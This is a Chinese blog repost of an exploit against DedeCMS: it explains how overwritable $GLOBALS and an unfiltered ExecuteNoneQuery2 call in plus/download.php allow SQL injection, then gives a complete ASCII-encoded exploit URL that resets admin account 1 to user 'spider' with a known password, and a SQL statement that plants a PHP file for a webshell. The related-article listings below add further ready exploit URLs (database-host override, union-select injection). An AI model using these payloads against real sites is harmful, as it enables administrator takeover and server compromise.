dedecms最新版本修改任意管理员漏洞

最新推荐文章于 2023-03-23 12:31:54 发布
最新推荐文章于 2023-03-23 12:31:54 发布
阅读量2.2k 收藏
点赞数

http://www.unhonker.com/bug/1272.html

此漏洞无视gpc转义,过80sec注入防御。

补充下,不用担心后台找不到。这只是一个demo,都能修改任意数据库了,还怕拿不到SHELL?

起因是全局变量$GLOBALS可以被任意修改,随便看了下,漏洞一堆,我只找了一处。

include /dedesql. class .php
 
if (isset( $GLOBALS [ 'arrs1' ]))
 
{
 
     $v1 = $v2 = '' ;
 
     for ( $i =0;isset( $arrs1 [ $i ]); $i ++)
 
     {
 
         $v1 .= chr ( $arrs1 [ $i ]);
 
     }
 
     for ( $i =0;isset( $arrs2 [ $i ]); $i ++)
 
     {
 
         $v2 .= chr ( $arrs2 [ $i ]);   //解码ascii
 
     }
 
     $GLOBALS [ $v1 ] .= $v2 ; //注意这里不是覆盖,是+
 
}
 
     function SetQuery( $sql )
 
     {
 
         $prefix = "#@__" ;
 
         $sql = str_replace ( $prefix , $GLOBALS [ 'cfg_dbprefix' ], $sql );  //看到这里无话可说,不明白为什么要这样做。
 
         $this ->queryString = $sql ;
 
     }

另外说下绕过80sec防注入的方法。
同一文件中,有两个执行SQL的函数。ExecuteNoneQuery和ExecuteNoneQuery2
而用ExecuteNoneQuery2执行SQL并没有防注入,于是随便找个用ExecuteNoneQuery2执行的文件。

plus/download.php

else if ( $open ==1)
 
{
 
     $id = isset( $id ) && is_numeric ( $id ) ? $id : 0;
 
     $link = base64_decode (urldecode( $link ));
 
     $hash = md5( $link );
 
//这里的#@_是可以控制的
 
     $rs = $dsql ->ExecuteNoneQuery2( "UPDATE `#@__downloads` SET downloads = downloads + 1 WHERE hash='$hash' " );
 
     if ( $rs ExecNoneQuery( $query );
 
     }
 
     header( "location:$link" );
 
     exit ();
 
}

构造SQL语句 (提交的时候用ascii加密,程序会帮我们自动解密的,所以无视gpc):
admin` SET `userid`='spider', `pwd`='f297a57a5a743894a0e4' where id=1 #
完整SQL语句:
UPDATE `dede_admin` SET `userid`='spider', `pwd`='f297a57a5a743894a0e4' where id=1 #_downloads` SET downloads = downloads + 1 WHERE hash='$hash'

EXP:

http: //localhost/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=97&arrs2[]=100&arrs2[]=109&arrs2[]=105&arrs2[]=110&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=117&arrs2[]=115&arrs2[]=101&arrs2[]=114&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=115&arrs2[]=112&arrs2[]=105&arrs2[]=100&arrs2[]=101&arrs2[]=114&arrs2[]=39&arrs2[]=44&arrs2[]=32&arrs2[]=96&arrs2[]=112&arrs2[]=119&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=102&arrs2[]=50&arrs2[]=57&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=97&arrs2[]=55&arrs2[]=52&arrs2[]=51&arrs2[]=56&arrs2[]=57&arrs2[]=52&arrs2[]=97&arrs2[]=48&arrs2[]=101&arrs2[]=52&arrs2[]=39&arrs2[]=32&arrs2[]=119&arrs2[]=104&arrs2[]=101&arrs2[]=114&arrs2[]=101&arrs2[]=32&arrs2[]=105&arrs2[]=100&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35

如果不出问题,后台登录用户spider密码admin
漏洞真的不止一处,各种包含,远程代码执行,很多,列位慢慢研究。

如果找不到后台,参见以前修改数据库直接拿SHELL的方法
UPDATE `dede_mytag` SET `normbody` = '{dede:php}file_put_contents(''spider.php'','''');{/dede:php}' WHERE `aid` =1 LIMIT 1 ;
转自:https://www.t00ls.net/thread-23071-1-1.html

转载文章请注明,转载自:小马's Blog http://www.i0day.com

本文链接: http://www.i0day.com/1403.html

cnbird2008
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
dedecms批量漏洞扫描.zip_dedecms_dedecms 扫描器_dedecms漏洞_dedecms路径扫描_批量扫描
07-13
dedecms批量漏洞扫描,大家可以自己试试效果
后台用户名不存在,密码被修改,spider,新漏洞轻松注入改后台密码
IT技术宅-北方的刀郎
03-21 1761
dedecms后台用户名不存在,密码被修改,spider,新漏洞轻松注入改后台密码dedecms后台用户名不存在,用户名密码被修改,spider,最新漏洞轻松改后台密码而破门而入.dede后台忽然无法登录提示用户名不存在?织梦最新漏洞攻击处理方法如果已经发现/data,有很长一个txt记事本,说明已经被其他人SQL注入了,或是已经有人进行尝试SQL注入了了。记事儿本如:5dfaaed91f3cbd
dedecms新版本修改任意管理员漏洞+getshell+exp
weixin_30439067的博客
08-03 4172
漏洞无视gpc转义,过80sec注入防御。 补充下,不用担心后台找不到。这只是一个demo,都能修改任意数据库了,还怕拿不到SHELL? 起因是全局变量$GLOBALS可以被任意修改,随便看了下,漏洞一堆,我只找了一处。 include/dedesql.class.php if(isset($GLOBALS['arrs1'])) { $v1 = $v2 = ''; ...
dedecms怎么改php版本_dedecms怎么修改Dedecms提示信息方法
weixin_39843078的博客
11-22 57
dedecms怎么修改Dedecms提示信息方法DEDECMS受到很多站长朋友的喜爱。然而,作为产品肯定要保护其版权,cms中难免有一些版权信息和产品字样,其中最典型的就是DEDECMS的跳转提示信息“Dedecms提示信息”,那么如何把这一字样改为自己网站的名称呢?其实非常简单,在5.1版本中,修改文件是:在include文件夹里找到inc_functions.php。但是从5.3版本开始,织梦...
DeDeCMS 越权
Darklord.W
04-13 845
DeDeCMS 越权 0x00 搭建dedecms 设置数据库密码 开启会员功能 0x01 注册会员 并在后台设置为通过审核 0x03 越权操作 创建000001用户 2、000001用户登陆,BP抓包 修改数据包 登陆至admin F12修改cookie值 修改admin会员密码 192.168.8.135/dedecms/membe...
织梦dedecms程序安全漏洞include/common.inc.php漏洞解决方法
winkexin的博客
03-23 374
1.受影响版本织梦dedecms 5.7、5.6、5.5。2.漏洞文件/include/common.inc.php 3.DEDECMS的全局变量初始化存在漏洞,可以任意覆盖任意全局变量。3.DEDECMS的全局变量初始化存在漏洞,可以任意覆盖任意全局变量。2.通过此漏洞进行各种越权操作构造漏洞直接写入webshell后门。2.漏洞文件/include/common.inc.php。1.受影响版本DEDECMS 5.7、5.6、5.5。1.黑客可以通过此漏洞来重定义数据库连接。文章到此为止 请自行完善吧。
DedeCMS 存储型xss漏洞1
08-03
Dedecms会员功能shops_delivery.php中的 des 参数存在存储型XSS漏洞,攻击者可利用漏洞获得用户测试环境:DedeCMS-V5.7-U
织梦dede管理员密码修改工具
01-22
织梦dede管理员密码修改工具,如果管理密码忘了、可以这个程序重置密码。
Dedecms存在储存型跨站脚本漏洞1
08-03
测试环境:DedeCMS-V5.7-UTF8-SP2 发布日期: 2017-03-15 官方最新版 漏洞利用条件:DedeCMS开启shop模块漏洞分析漏洞触发
SQLite的各个版本
05-02
SQLite的各个版本
php越权访问漏洞,织梦(DedeCms) v5.6-5.7 越权访问漏洞
weixin_29220405的博客
03-24 574
http://www.XXXX.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS]...
【转】dedecms新版本修改任意管理员漏洞 附getshell exp
ITfinder
06-30 518
漏洞无视gpc转义,过80sec注入防御。 补充下,不用担心后台找不到。这只是一个demo,都能修改任意数据库了,还怕拿不到SHELL? 起因是全局变量$GLOBALS可以被任意修改,随便看了下,漏洞一堆,我只找了一处。 include/dedesql.class.php: if(isset($GLOBALS['arrs1'])) { $v1 = $v2 = ''; ...
dedecms 修改任意管理员漏洞
weixin_30519071的博客
06-07 142
漏洞版本: dedecms v5.7 漏洞描述: 起因是全局变量$GLOBALS可以被任意修改,随便看了下,漏洞一堆,我只找了一处。 include/dedesql.class.php if(isset($GLOBALS['arrs1'])) { $v1 = $v2 =''; for($i=0;isset($arrs1[$i]);$i++) { $v1...
dedecms注入爆管理员用户密码方法
K的博客
08-23 5722
dedecms注入爆管理员用户密码方法 2014年03月04日18:24 阅读: 1209 次 标签: dedecms注入爆管理员用户密码方法 关键词:powered by dedecms 首先注册个用户,注册地址: /member/index_do.php?fmdo=user&dopost=regnew 爆管理帐号: /member/buy_action.php?produ
DeDecms(织梦CMS)最新版任意用户密码重置漏洞分析
热门推荐
3569
01-11 1万+
http://docs.ioin.in/writeup/xianzhi.aliyun.com/_forum_topic_1926/index.html DeDecms(织梦CMS) V5.7.72 正式版20180109 (最新版) 由于前台resetpassword.php中对接受的safeanswer参数类型比较不够严格,遭受弱类型比较攻击 导致了远程攻击者可以在前台会员中心绕过
《WEB安全渗透测试》(18)DedecmsV5.7越权漏洞+前台重置管理员密码漏洞复现(2)
午夜观星河
11-17 3598
《WEB安全渗透测试》(18)DedecmsV5.7越权漏洞+前台重置管理员密码漏洞复现(2) 接着上一篇,我们已经获取到一个webshell,这篇文章是后续提权及漏洞利用。(1)systeminfo生成文件systeminfo >dedecms.txt(2)更新windows-exploit-suggester下载windows-exploit-suggester.py后,先安装xlrd,之后才可以更新。...
《WEB安全渗透测试》(17)Dedecms越权漏洞+前台重置管理员密码漏洞复现(1)
午夜观星河
11-17 4237
《WEB安全渗透测试》(17)Dedecms越权漏洞+前台重置管理员密码漏洞复现(1) 在Windows server2008服务器上安装phpstudy,将dedecms的网站源码复制到C:\phpStudy\PHPTutorial\WWW\下,启动phpstudy,运行模式选择系统服务,安装成功后,可以在浏览器访问服务器ip地址,如下所示:访问如下安装地址,提示删除install/install_lock.txt。删除后,可以正常访问,之后按照提示安装完成即可。安装完成后,访问首页。...
dedecms整理
hacker0ne的博客
04-11 1174
http://www.moonsec.com/post-13.html (首发)dedecms 5.7 最新漏洞(绝非网上公布的) 漏洞成功需要条件: 1. php magic_quotes_gpc=off 2.漏洞文件存在 plus/guestbook.php dede_guestboo...
dedecms漏洞复现
最新发布
03-28
由于 Dedecms 平台存在多个漏洞,以下是一个常见的 Dedecms 漏洞复现过程: 1. 扫描目标 Dedecms 站点,确定其版本号和漏洞类型。 2. 找到对应的漏洞利用代码,例如 Dedecms v5.7 SP2 sql注入漏洞利用代码: ``` http://www.target.com/search.php?kw=%27%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100%23 ``` 3. 将漏洞利用代码粘贴到浏览器地址栏并访问,如果出现错误信息或页面内容发生变化,则说明漏洞存在。 4. 利用漏洞进行攻击,例如获取敏感数据、添加管理员账户等。 需要注意的是,任何未经授权的攻击行为都是违法的,建议仅在合法的安全测试环境中进行漏洞复现和攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值